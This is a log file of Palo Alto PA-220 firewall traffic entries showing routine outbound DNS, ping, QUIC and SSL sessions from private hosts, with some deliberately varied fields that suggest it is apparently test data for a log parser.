-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 
16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
